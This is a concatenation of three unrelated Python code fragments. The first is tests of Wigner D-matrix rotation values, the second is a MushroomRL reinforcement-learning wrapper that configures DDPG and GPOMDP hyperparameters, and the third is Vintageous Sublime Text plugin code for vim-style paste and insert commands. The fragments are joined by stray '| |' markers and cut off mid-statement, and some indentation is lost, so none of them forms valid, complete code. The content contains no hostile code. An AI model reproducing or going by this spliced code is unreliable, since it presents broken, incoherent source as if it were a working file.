assert Rotation.D(S(3)/2, S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
(sin(beta/2) - 3*sin(3*beta/2))/4*exp(-I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, S(1)/2, -S(3)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(-I*alpha/2)*exp(3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, S(3)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, S(1)/2, alpha, beta, gamma).doit() == \
(-sin(beta/2) + 3*sin(3*beta/2))/4*exp(I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, -S(1)/2, alpha, beta, gamma).doit() == \
(cos(beta/2) + 3*cos(3*beta/2))/4*exp(I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, -S(1)/2, -S(3)/2, alpha, beta, gamma).doit() == \
-sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(I*alpha/2)*exp(3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, S(3)/2, alpha, beta, gamma).doit() == \
(3*sin(beta/2) - sin(3*beta/2))/4*exp(3*I*alpha/2)*exp(-3*I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, S(1)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(cos(beta/2) - cos(3*beta/2))/4*exp(3*I*alpha/2)*exp(-I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, -S(1)/2, alpha, beta, gamma).doit() == \
sqrt(3)*(sin(beta/2) + sin(3*beta/2))/4*exp(3*I*alpha/2)*exp(I*gamma/2)
assert Rotation.D(S(3)/2, -S(3)/2, -S(3)/2, alpha, beta, gamma).doit() == \
(3*cos(beta/2) + cos(3*beta/2))/4*exp(3*I*alpha/2)*exp(3*I*gamma/2)
# j = 2
assert Rotation.D(2, 2, 2, alpha, beta, gamma).doit() == \
(3 + 4*cos(beta) + cos(2*beta))/8*exp(-2*I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, 2, 1, alpha, beta, gamma).doit() == \
-((cos(beta) + 1)*exp(-2*I*alpha)*exp(-I*gamma)*sin(beta))/2
assert Rotation.D(2, 2, 0, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(-2*I*alpha)
assert Rotation.D(2, 2, -1, alpha, beta, gamma).doit() == \
(cos(beta) - 1)*sin(beta)/2*exp(-2*I*alpha)*exp(I*gamma)
assert Rotation.D(2, 2, -2, alpha, beta, gamma).doit() == \
(3 - 4*cos(beta) + cos(2*beta))/8*exp(-2*I*alpha)*exp(2*I*gamma)
assert Rotation.D(2, 1, 2, alpha, beta, gamma).doit() == \
(cos(beta) + 1)*sin(beta)/2*exp(-I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, 1, 1, alpha, beta, gamma).doit() == \
(cos(beta) + cos(2*beta))/2*exp(-I*alpha)*exp(-I*gamma)
assert Rotation.D(2, 1, 0, alpha, beta, gamma).doit() == -sqrt(6)* \
sin(2*beta)/4*exp(-I*alpha)
assert Rotation.D(2, 1, -1, alpha, beta, gamma).doit() == \
(cos(beta) - cos(2*beta))/2*exp(-I*alpha)*exp(I*gamma)
assert Rotation.D(2, 1, -2, alpha, beta, gamma).doit() == \
(cos(beta) - 1)*sin(beta)/2*exp(-I*alpha)*exp(2*I*gamma)
assert Rotation.D(2, 0, 2, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(-2*I*gamma)
assert Rotation.D(2, 0, 1, alpha, beta, gamma).doit() == sqrt(6)* \
sin(2*beta)/4*exp(-I*gamma)
assert Rotation.D(
2, 0, 0, alpha, beta, gamma).doit() == (1 + 3*cos(2*beta))/4
assert Rotation.D(2, 0, -1, alpha, beta, gamma).doit() == -sqrt(6)* \
sin(2*beta)/4*exp(I*gamma)
assert Rotation.D(2, 0, -2, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(2*I*gamma)
assert Rotation.D(2, -1, 2, alpha, beta, gamma).doit() == \
(2*sin(beta) - sin(2*beta))/4*exp(I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, -1, 1, alpha, beta, gamma).doit() == \
(cos(beta) - cos(2*beta))/2*exp(I*alpha)*exp(-I*gamma)
assert Rotation.D(2, -1, 0, alpha, beta, gamma).doit() == sqrt(6)* \
sin(2*beta)/4*exp(I*alpha)
assert Rotation.D(2, -1, -1, alpha, beta, gamma).doit() == \
(cos(beta) + cos(2*beta))/2*exp(I*alpha)*exp(I*gamma)
assert Rotation.D(2, -1, -2, alpha, beta, gamma).doit() == \
-((cos(beta) + 1)*sin(beta))/2*exp(I*alpha)*exp(2*I*gamma)
assert Rotation.D(2, -2, 2, alpha, beta, gamma).doit() == \
(3 - 4*cos(beta) + cos(2*beta))/8*exp(2*I*alpha)*exp(-2*I*gamma)
assert Rotation.D(2, -2, 1, alpha, beta, gamma).doit() == \
(2*sin(beta) - sin(2*beta))/4*exp(2*I*alpha)*exp(-I*gamma)
assert Rotation.D(2, -2, 0, alpha, beta, gamma).doit() == \
sqrt(6)*sin(beta)**2/4*exp(2*I*alpha)
assert Rotation.D(2, -2, -1, alpha, beta, gamma).doit() == \
(cos(beta) + 1)*sin(beta)/2*exp(2*I*alpha)*exp(I*gamma)
assert Rotation.D(2, -2, -2, alpha, beta, gamma).doit() == \
(3 + 4*cos(beta) + cos(2*beta))/8*exp(2*I*alpha)*exp(2*I*gamma)
# Numerical tests
# j = 1/2
assert Rotation.D(
S(1)/2, S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/2
assert Rotation.D(
S(1)/2, S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -sqrt(2)/2
assert Rotation.D(
S(1)/2, -S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == sqrt(2)/2
assert Rotation.D(
S(1)/2, -S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/2
# j = 1
assert Rotation.D(1, 1, 1, pi/2, pi/2, pi/2).doit() == -1/2
assert Rotation.D(1, 1, 0, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/2
assert Rotation.D(1, 1, -1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(1, 0, 1, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/2
assert Rotation.D(1, 0, 0, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(1, 0, -1, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/2
assert Rotation.D(1, -1, 1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(1, -1, 0, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/2
assert Rotation.D(1, -1, -1, pi/2, pi/2, pi/2).doit() == -1/2
# j = 3/2
assert Rotation.D(
S(3)/2, S(3)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/4
assert Rotation.D(
S(3)/2, S(3)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == sqrt(6)/4
assert Rotation.D(
S(3)/2, S(3)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(6)/4
assert Rotation.D(
S(3)/2, S(3)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == -sqrt(2)/4
assert Rotation.D(
S(3)/2, S(1)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(
S(3)/2, S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(2)/4
assert Rotation.D(
S(3)/2, S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -sqrt(2)/4
assert Rotation.D(
S(3)/2, S(1)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(1)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(1)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == sqrt(2)/4
assert Rotation.D(
S(3)/2, -S(1)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/4
assert Rotation.D(
S(3)/2, -S(1)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(3)/2, S(3)/2, pi/2, pi/2, pi/2).doit() == sqrt(2)/4
assert Rotation.D(
S(3)/2, -S(3)/2, S(1)/2, pi/2, pi/2, pi/2).doit() == I*sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(3)/2, -S(1)/2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(
S(3)/2, -S(3)/2, -S(3)/2, pi/2, pi/2, pi/2).doit() == -I*sqrt(2)/4
# j = 2
assert Rotation.D(2, 2, 2, pi/2, pi/2, pi/2).doit() == 1/4
assert Rotation.D(2, 2, 1, pi/2, pi/2, pi/2).doit() == -I/2
assert Rotation.D(2, 2, 0, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(2, 2, -1, pi/2, pi/2, pi/2).doit() == I/2
assert Rotation.D(2, 2, -2, pi/2, pi/2, pi/2).doit() == 1/4
assert Rotation.D(2, 1, 2, pi/2, pi/2, pi/2).doit() == I/2
assert Rotation.D(2, 1, 1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, 1, 0, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, 1, -1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, 1, -2, pi/2, pi/2, pi/2).doit() == -I/2
assert Rotation.D(2, 0, 2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(2, 0, 1, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, 0, 0, pi/2, pi/2, pi/2).doit() == -1/2
assert Rotation.D(2, 0, -1, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, 0, -2, pi/2, pi/2, pi/2).doit() == -sqrt(6)/4
assert Rotation.D(2, -1, 2, pi/2, pi/2, pi/2).doit() == -I/2
assert Rotation.D(2, -1, 1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, -1, 0, pi/2, pi/2, pi/2).doit() == 0
assert Rotation.D(2, -1, -1, pi/2, pi/2, pi/2).doit() == 1/2
assert Rotation.D(2, -1, -2, pi/2, pi/2, pi/2).doit() == I/2
assert Rotation.D(2, -2, 2, pi/2, pi/2, | |
"""
Parameters
----------
info_MDP: This is an object of Class mushroom_rl.environment.MDPInfo. It contains the action and observation spaces,
gamma and the horizon of the MDP.
Returns
-------
This method returns True if the algo_params were set successfully, and False otherwise.
"""
self.info_MDP = info_MDP
if(self.algo_params is None):
policy_class = Categorical(hp_name='policy_class', obj_name='policy_class_'+str(self.model.__name__),
current_actual_value=OrnsteinUhlenbeckPolicy)
sigma = Real(hp_name='sigma', current_actual_value=0.2, obj_name='sigma_'+str(self.model.__name__))
theta = Real(hp_name='theta', current_actual_value=0.15, obj_name='theta_'+str(self.model.__name__))
dt = Real(hp_name='dt', current_actual_value=1e-2, obj_name='dt_'+str(self.model.__name__))
critic, actor = self._default_network()
#actor:
actor_network = Categorical(hp_name='actor_network', obj_name='actor_network_'+str(self.model.__name__),
current_actual_value=actor)
actor_class = Categorical(hp_name='actor_class', obj_name='actor_class_'+str(self.model.__name__),
current_actual_value=optim.Adam)
actor_lr = Real(hp_name='actor_lr', obj_name='actor_lr_'+str(self.model.__name__),
current_actual_value=1e-3, range_of_values=[1e-5, 1e-3], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
#critic:
critic_network = Categorical(hp_name='critic_network', obj_name='critic_network_'+str(self.model.__name__),
current_actual_value=critic)
critic_class = Categorical(hp_name='critic_class', obj_name='critic_class_'+str(self.model.__name__),
current_actual_value=optim.Adam)
critic_lr = Real(hp_name='critic_lr', obj_name='critic_lr_'+str(self.model.__name__),
current_actual_value=1e-3, range_of_values=[1e-5, 1e-3], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
critic_loss = Categorical(hp_name='loss', obj_name='loss_'+str(self.model.__name__),
current_actual_value=F.mse_loss)
batch_size = Integer(hp_name='batch_size', obj_name='batch_size_'+str(self.model.__name__),
current_actual_value=100, range_of_values=[8, 128], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
initial_replay_size = Integer(hp_name='initial_replay_size', current_actual_value=50000,
range_of_values=[1000, 10000], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, obj_name='initial_replay_size_'+str(self.model.__name__))
max_replay_size = Integer(hp_name='max_replay_size', current_actual_value=1000000, range_of_values=[10000, 1000000],
to_mutate=True, seeder=self.seeder, log_mode=self.log_mode,
obj_name='max_replay_size_'+str(self.model.__name__))
tau = Real(hp_name='tau', current_actual_value=0.005, obj_name='tau_'+str(self.model.__name__))
policy_delay = Integer(hp_name='policy_delay', current_actual_value=1,
obj_name='policy_delay_'+str(self.model.__name__))
n_epochs = Integer(hp_name='n_epochs', current_actual_value=10, range_of_values=[1,50], to_mutate=True,
obj_name='n_epochs_'+str(self.model.__name__), seeder=self.seeder, log_mode=self.log_mode,
checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
n_steps = Integer(hp_name='n_steps', current_actual_value=None, obj_name='n_steps_'+str(self.model.__name__),
seeder=self.seeder, log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path,
verbosity=self.verbosity)
n_steps_per_fit = Integer(hp_name='n_steps_per_fit', current_actual_value=None, to_mutate=False,
obj_name='n_steps_per_fit_'+str(self.model.__name__), seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path,
verbosity=self.verbosity)
n_episodes = Integer(hp_name='n_episodes', current_actual_value=500, range_of_values=[10,1000], to_mutate=True,
obj_name='n_episodes_'+str(self.model.__name__), seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path,
verbosity=self.verbosity)
n_episodes_per_fit = Integer(hp_name='n_episodes_per_fit', current_actual_value=50, range_of_values=[1,1000],
to_mutate=True, obj_name='n_episodes_per_fit_'+str(self.model.__name__),
seeder=self.seeder, log_mode=self.log_mode,
checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
dict_of_params = {'policy_class': policy_class,
'sigma': sigma,
'theta': theta,
'dt': dt,
'actor_network': actor_network,
'actor_class': actor_class,
'actor_lr': actor_lr,
'critic_network': critic_network,
'critic_class': critic_class,
'critic_lr': critic_lr,
'loss': critic_loss,
'batch_size': batch_size,
'initial_replay_size': initial_replay_size,
'max_replay_size': max_replay_size,
'tau': tau,
'policy_delay': policy_delay,
'n_epochs': n_epochs,
'n_steps': n_steps,
'n_steps_per_fit': n_steps_per_fit,
'n_episodes': n_episodes,
'n_episodes_per_fit': n_episodes_per_fit
}
self.algo_params = dict_of_params
is_set_param_success = self.set_params(new_params=self.algo_params)
if(not is_set_param_success):
err_msg = 'There was an error setting the parameters of a'+'\''+str(self.__class__.__name__)+'\' object!'
self.logger.error(msg=err_msg)
self.fully_instantiated = False
self.is_learn_successful = False
return False
self.logger.info(msg='\''+str(self.__class__.__name__)+'\' object fully instantiated!')
self.fully_instantiated = True
return True
    def model_specific_set_params(self, new_params, mdp_info, input_shape, output_shape, n_actions):
        """
        Re-structure a flat dictionary of hyper-parameters into the nested layout expected by
        MushroomRL's DDPG constructor, build the DDPG object, and split off the parameters that
        are only needed later in learn().

        Parameters
        ----------
        new_params: These are the new parameters to set in the RL algorithm. It is a flat
                    dictionary containing objects of Class HyperParameter.
        mdp_info: This is an object of Class mushroom_rl.environment.MDPInfo: it contains the
                  action space, the observation space and gamma and the horizon of the MDP.
        input_shape: The shape of the observation space.
        output_shape: The shape of the action space.
        n_actions: If the space is Discrete this is the number of actions.

        Returns
        -------
        tmp_structured_algo_params: A structured dictionary containing the parameters that are
                                    strictly part of the RL algorithm.
        dict_to_add: A flat dictionary containing parameters needed in the method learn() that
                     are not strictly part of the RL algorithm, like the number of epochs and
                     the number of episodes.
        """
        # The critic evaluates Q(s, a): its input is the observation concatenated with the
        # action, hence observation width + action width.
        critic_input_shape = Categorical(hp_name='critic_input_shape', obj_name='critic_input_shape_'+str(self.model.__name__),
                                         current_actual_value=(input_shape.current_actual_value[0]+
                                                               self.info_MDP.action_space.shape[0],))
        # The critic outputs a single scalar value.
        critic_output_shape = Categorical(hp_name='critic_output_shape', current_actual_value=(1,),
                                          obj_name='critic_output_shape_'+str(self.model.__name__))
        # Skeleton of the nested parameter dict; the None placeholders for the optimizer
        # classes and learning rates are filled in by the routing loop below.
        tmp_structured_algo_params = {'mdp_info': mdp_info,
                                      'actor_params': {'input_shape': input_shape,
                                                       'n_actions': n_actions,
                                                       'output_shape': output_shape
                                                      },
                                      'actor_optimizer': {'class': None, 'params': {'lr': None}},
                                      'critic_params': {'input_shape': critic_input_shape,
                                                        'output_shape': critic_output_shape,
                                                        'optimizer': {'class': None, 'params': {'lr': None}}
                                                       }
                                     }
        # Either np.ones(1) or np.ones(self.info_MDP.action_space.shape[0]): the scalar sigma
        # is wrapped in an array for the exploration policy.
        new_sigma = np.ones(1)*new_params['sigma'].current_actual_value
        policy_params_dict = dict(sigma=new_sigma, theta=new_params['theta'].current_actual_value,
                                  dt=new_params['dt'].current_actual_value)
        policy_params = Categorical(hp_name='policy_params', current_actual_value=policy_params_dict,
                                    obj_name='policy_params_'+str(self.model.__name__))
        new_params.update({'policy_params': policy_params})
        # Route each flat hyper-parameter into its slot of the structured dict. Note that
        # 'mdp_info' is deliberately never overwritten here.
        for tmp_key in list(new_params.keys()):
            if(tmp_key in ['policy_class', 'policy_params', 'batch_size', 'initial_replay_size', 'max_replay_size', 'tau',
                           'policy_delay']):
                tmp_structured_algo_params.update({tmp_key: new_params[tmp_key]})
            if(tmp_key == 'loss'):
                tmp_structured_algo_params['critic_params'].update({tmp_key: new_params[tmp_key]})
            if(tmp_key == 'critic_network'):
                tmp_structured_algo_params['critic_params'].update({'network': new_params[tmp_key]})
            if(tmp_key == 'critic_class'):
                tmp_structured_algo_params['critic_params']['optimizer'].update({'class': new_params[tmp_key]})
            if(tmp_key == 'critic_lr'):
                tmp_structured_algo_params['critic_params']['optimizer']['params'].update({'lr': new_params[tmp_key]})
            if(tmp_key == 'actor_network'):
                tmp_structured_algo_params['actor_params'].update({'network': new_params[tmp_key]})
            if(tmp_key == 'actor_class'):
                tmp_structured_algo_params['actor_optimizer'].update({'class': new_params[tmp_key]})
            if(tmp_key == 'actor_lr'):
                tmp_structured_algo_params['actor_optimizer']['params'].update({'lr': new_params[tmp_key]})
        # Strip the HyperParameter wrappers down to their actual values before handing the
        # dict to MushroomRL.
        structured_dict_of_values = self._select_current_actual_value_from_hp_classes(params_structured_dict=
                                                                                      tmp_structured_algo_params)
        # structured_dict_of_values must be un-packed as keyword arguments for DDPG.
        self.algo_object = DDPG(**structured_dict_of_values)
        # Now that the DDPG object is created, resolve the naming conflict between the
        # 'actor_class', 'actor_lr', 'actor_network', 'critic_class', 'critic_lr' and
        # 'critic_network' entries: their keys are changed back from the generic 'class',
        # 'lr' and 'network' names (required by MushroomRL) to the prefixed names used by
        # this framework.
        tmp_structured_algo_params['critic_params']['critic_network'] = tmp_structured_algo_params['critic_params']['network']
        del tmp_structured_algo_params['critic_params']['network']
        new_val = tmp_structured_algo_params['critic_params']['optimizer']['class']
        tmp_structured_algo_params['critic_params']['optimizer']['critic_class'] = new_val
        del tmp_structured_algo_params['critic_params']['optimizer']['class']
        new_val = tmp_structured_algo_params['critic_params']['optimizer']['params']['lr']
        tmp_structured_algo_params['critic_params']['optimizer']['params']['critic_lr'] = new_val
        del tmp_structured_algo_params['critic_params']['optimizer']['params']['lr']
        new_val = tmp_structured_algo_params['actor_params']['network']
        tmp_structured_algo_params['actor_params']['actor_network'] = new_val
        del tmp_structured_algo_params['actor_params']['network']
        tmp_structured_algo_params['actor_optimizer']['actor_class'] = tmp_structured_algo_params['actor_optimizer']['class']
        del tmp_structured_algo_params['actor_optimizer']['class']
        new_val = tmp_structured_algo_params['actor_optimizer']['params']['lr']
        tmp_structured_algo_params['actor_optimizer']['params']['actor_lr'] = new_val
        del tmp_structured_algo_params['actor_optimizer']['params']['lr']
        # Delete policy_params: it is constructed anew on every call to this method.
        del tmp_structured_algo_params['policy_params']
        # Collect the parameters consumed by learn() rather than by the DDPG constructor:
        # n_epochs, n_steps, n_steps_per_fit, n_episodes, n_episodes_per_fit, sigma, theta, dt.
        dict_to_add = {'n_epochs': new_params['n_epochs'],
                       'n_steps': new_params['n_steps'],
                       'n_steps_per_fit': new_params['n_steps_per_fit'],
                       'n_episodes': new_params['n_episodes'],
                       'n_episodes_per_fit': new_params['n_episodes_per_fit'],
                       'sigma': new_params['sigma'],
                       'theta': new_params['theta'],
                       'dt': new_params['dt']
                      }
        return tmp_structured_algo_params, dict_to_add
class ModelGenerationMushroomOnlineGPOMDP(ModelGenerationMushroomOnline):
"""
This Class implements a specific online model generation algorithm: GPOMDP. This Class wraps the GPOMDP method implemented in
MushroomRL.
cf. https://github.com/MushroomRL/mushroom-rl/blob/dev/mushroom_rl/algorithms/policy_search/policy_gradient/gpomdp.py
This Class inherits from the Class ModelGenerationMushroomOnline.
"""
def __init__(self, eval_metric, obj_name, regressor_type='generic_regressor', seeder=2, algo_params=None, log_mode='console',
checkpoint_log_path=None, verbosity=3, n_jobs=1, job_type='process', deterministic_output_policy=True):
"""
Parameters
----------
algo_params: This is either None or a dictionary containing all the needed parameters.
The default is None.
If None then the following parameters will be used:
'policy': StateStdGaussianPolicy,
'approximator': LinearApproximator,
'input_shape': self.info_MDP.observation_space.shape,
'n_actions': None,
'output_shape': self.info_MDP.action_space.shape,
'optimizer': AdaptiveOptimizer,
'eps': 1e-2,
'n_epochs': 10,
'n_steps': None,
'n_steps_per_fit': None,
'n_episodes': 500,
'n_episodes_per_fit': 50
regressor_type: This is a string and it can either be: 'action_regressor', 'q_regressor' or 'generic_regressor'. This is
used to pick one of the 3 possible kind of regressor made available by MushroomRL.
Note that if you want to use a 'q_regressor' then the picked regressor must be able to perform
multi-target regression, as a single regressor is used for all actions.
The default is 'generic_regressor'.
deterministic_output_policy: If this is True then the output policy will be rendered deterministic else if False nothing
will be done. Note that the policy is made deterministic only at the end of the learn()
method.
Non-Parameters Members
----------------------
fully_instantiated: This is True if the block is fully instantiated, False otherwise. It is mainly used to make sure that
when we call the learn method the model generation blocks have been fully instantiated as they
undergo two stage initialisation being info_MDP unknown at the beginning of the pipeline.
info_MDP: This is a dictionary compliant with the parameters needed in input to all MushroomRL model generation
algorithms. It containts the observation space, the action space, the MDP horizon and the MDP gamma.
algo_object: This is the object containing the actual model generation algorithm.
algo_params_upon_instantiation: This a copy of the original value of algo_params, namely the value of
algo_params that the object got upon creation. This is needed for re-loading
objects.
model: This is used in set_params in the generic Class ModelGenerationMushroomOnline. With this member we avoid
re-writing for each Class inheriting from the Class ModelGenerationMushroomOnline the set_params method.
In this Class this member equals to GPOMDP, which is the Class of MushroomRL implementing GPOMDP.
core: This is used to contain the Core object of MushroomRL needed to run online RL algorithms.
The other parameters and non-parameters members are described in the Class Block.
"""
super().__init__(eval_metric=eval_metric, obj_name=obj_name, seeder=seeder, log_mode=log_mode,
checkpoint_log_path=checkpoint_log_path, verbosity=verbosity, n_jobs=n_jobs, job_type=job_type)
self.works_on_online_rl = True
self.works_on_offline_rl = False
self.works_on_box_action_space = True
self.works_on_discrete_action_space = False
self.works_on_box_observation_space = True
self.works_on_discrete_observation_space = True
self.regressor_type = | |
<filename>actions.py
"""Sublime Text commands performing vim actions.
If you are implementing a new action command, stick it here.
Action parsers belong instead in Vintageous/vi/actions.py.
"""
import sublime
import sublime_plugin
from Vintageous.state import IrreversibleTextCommand
from Vintageous.state import VintageState
from Vintageous.vi import utils
from Vintageous.vi import inputs
from Vintageous.vi.constants import _MODE_INTERNAL_NORMAL
from Vintageous.vi.constants import MODE_INSERT
from Vintageous.vi.constants import MODE_NORMAL
from Vintageous.vi.constants import MODE_VISUAL
from Vintageous.vi.constants import MODE_VISUAL_LINE
from Vintageous.vi.constants import MODE_SELECT
from Vintageous.vi.constants import regions_transformer
from Vintageous.vi.constants import regions_transformer_reversed
from Vintageous.vi.registers import REG_EXPRESSION
import re
class ViEditAtEol(sublime_plugin.TextCommand):
    """Enter insert mode with every caret moved to the hard end of its line (vim A-like)."""
    def run(self, edit, extend=False):
        state = VintageState(self.view)
        state.enter_insert_mode()
        self.view.run_command('collapse_to_direction')

        old_sels = list(self.view.sel())
        self.view.sel().clear()

        # One empty region at the hard EOL of each previous selection.
        eol_regions = [sublime.Region(self.view.line(s.b).end(),
                                      self.view.line(s.b).end())
                       for s in old_sels]
        self.view.sel().add_all(eol_regions)
class ViEditAfterCaret(sublime_plugin.TextCommand):
    """Enter insert mode with carets placed after the current position (vim a-like)."""
    def run(self, edit, extend=False):
        state = VintageState(self.view)
        state.enter_insert_mode()

        was_visual = self.view.has_non_empty_selection_region()
        old_sels = list(self.view.sel())
        self.view.sel().clear()

        for s in old_sels:
            # In visual mode collapse to the selection's end; otherwise advance
            # one character, unless the caret already sits at end of line.
            if was_visual or utils.is_at_eol(self.view, s):
                pt = s.end()
            else:
                pt = s.end() + 1
            self.view.sel().add(sublime.Region(pt, pt))
class _vi_big_i(sublime_plugin.TextCommand):
    """Enter insert mode at the first non-blank character of each line (vim I)."""
    def run(self, edit, extend=False):
        def to_first_non_blank(view, s):
            # Empty region at the first non-whitespace character of the caret's line.
            pt = utils.next_non_white_space_char(view, view.line(s.b).a)
            return sublime.Region(pt, pt)

        state = VintageState(self.view)
        state.enter_insert_mode()
        regions_transformer(self.view, to_first_non_blank)
class ViPaste(sublime_plugin.TextCommand):
    """Paste register contents after the caret (vim `p`).

    Linewise fragments (those normalised by prepare_fragment to start with '\n')
    are inserted at line boundaries; charwise fragments are inserted after the
    caret with a running offset so earlier insertions don't shift later ones.
    """

    def run(self, edit, register=None, count=1):
        state = VintageState(self.view)

        # Fall back to the unnamed register.
        register = register or '"'
        fragments = state.registers[register]
        if not fragments:
            print("Vintageous: Nothing in register \".")
            return

        sels = list(self.view.sel())
        # If we have the same number of pastes and selections, map 1:1. Otherwise paste paste[0]
        # to all target selections.
        if len(sels) == len(fragments):
            sel_to_frag_mapped = zip(sels, fragments)
        else:
            sel_to_frag_mapped = zip(sels, [fragments[0],] * len(sels))

        # FIXME: Fix this mess. Separate linewise from charwise pasting.
        pasting_linewise = True
        offset = 0
        paste_locations = []
        # Iterate in reverse buffer order so insertions don't invalidate the
        # regions still to be processed.
        for selection, fragment in reversed(list(sel_to_frag_mapped)):
            fragment = self.prepare_fragment(fragment)
            if fragment.startswith('\n'):
                # Pasting linewise...
                # If pasting at EOL or BOL, make sure we paste before the newline character.
                if (utils.is_at_eol(self.view, selection) or
                    utils.is_at_bol(self.view, selection)):
                    l = self.paste_all(edit, selection,
                                       self.view.line(selection.b).b,
                                       fragment,
                                       count)
                    paste_locations.append(l)
                else:
                    l = self.paste_all(edit, selection,
                                       self.view.line(selection.b - 1).b,
                                       fragment,
                                       count)
                    paste_locations.append(l)
            else:
                pasting_linewise = False
                # Pasting charwise...
                # If pasting at EOL, make sure we don't paste after the newline character.
                if self.view.substr(selection.b) == '\n':
                    l = self.paste_all(edit, selection, selection.b + offset,
                                       fragment, count)
                    paste_locations.append(l)
                else:
                    l = self.paste_all(edit, selection, selection.b + offset + 1,
                                       fragment, count)
                    paste_locations.append(l)
                # Track how much text was inserted before subsequent selections.
                offset += len(fragment) * count

        if pasting_linewise:
            self.reset_carets_linewise()
        else:
            # NOTE(review): `fragment` is the last loop variable here; if `sels`
            # were ever empty this would raise NameError -- confirm callers
            # guarantee at least one selection.
            self.reset_carets_charwise(paste_locations, len(fragment))

    def reset_carets_charwise(self, paste_locations, paste_len):
        """Place carets on the last character of each charwise paste."""
        # FIXME: Won't work for multiple jagged pastes...
        b_pts = [s.b for s in list(self.view.sel())]
        if len(b_pts) > 1:
            self.view.sel().clear()
            self.view.sel().add_all([sublime.Region(ploc + paste_len - 1,
                                                    ploc + paste_len - 1)
                                     for ploc in paste_locations])
        else:
            self.view.sel().clear()
            self.view.sel().add(sublime.Region(paste_locations[0] + paste_len - 1,
                                               paste_locations[0] + paste_len - 1))

    def reset_carets_linewise(self):
        """Move each caret to the start of the line below it after a linewise paste."""
        # FIXME: Won't work well for visual selections...
        # FIXME: This might not work for cmdline paste command (the target row isn't necessarily
        # the next one.
        state = VintageState(self.view)

        if state.mode == MODE_VISUAL_LINE:
            self.view.run_command('collapse_to_a')
        else:
            # After pasting linewise, we should move the caret one line down.
            b_pts = [s.b for s in list(self.view.sel())]
            new_rows = [self.view.rowcol(b)[0] + 1 for b in b_pts]
            row_starts = [self.view.text_point(r, 0) for r in new_rows]
            self.view.sel().clear()
            self.view.sel().add_all([sublime.Region(pt, pt) for pt in row_starts])

    def prepare_fragment(self, text):
        """Normalise a linewise fragment: move its trailing '\n' to the front as a marker."""
        if text.endswith('\n') and text != '\n':
            text = '\n' + text[0:-1]
        return text

    # TODO: Improve this signature.
    def paste_all(self, edit, sel, at, text, count):
        """Insert `text` `count` times at point `at` (normal modes) or replace the
